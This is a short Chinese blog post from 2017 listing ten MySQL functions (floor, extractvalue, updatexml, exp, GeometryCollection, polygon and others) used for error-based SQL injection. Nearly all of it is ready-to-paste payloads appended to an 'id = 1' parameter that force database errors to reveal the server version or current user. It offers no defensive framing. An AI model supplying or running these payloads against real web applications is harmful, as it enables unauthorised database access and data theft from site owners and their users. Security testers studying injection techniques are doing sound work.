美文网首页
SQL注入报错的十大函数

SQL注入报错的十大函数

作者: H0f_9 | 来源:发表于2017-12-29 21:40 被阅读0次

1.floor()

id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);

2.extractvalue()

id = 1 and (extractvalue(1, concat(0x5c,(select user()))));

3.updatexml()

id = 1 and (updatexml(0x3a,concat(1,(select user())),1));

4.exp()

id =1 and EXP(~(SELECT * from(select user())a));

5.GeometryCollection()

id = 1 AND GeometryCollection((select * from (select * from(select user())a)b));

6.polygon()

id =1 and polygon((select * from(select * from(select user())a)b));

7.multipoint()

id = 1 and multipoint((select * from(select * from(select user())a)b));

8.multilinestring()

id = 1 and multilinestring((select * from(select * from(select user())a)b));

9.linestring()

id = 1 and LINESTRING((select * from(select * from(select user())a)b));

10.multipolygon()

id =1 and multipolygon((select * from(select * from(select user())a)b));

相关文章

网友评论

      本文标题:SQL注入报错的十大函数

      本文链接:https://www.haomeiwen.com/subject/bymwgxtx.html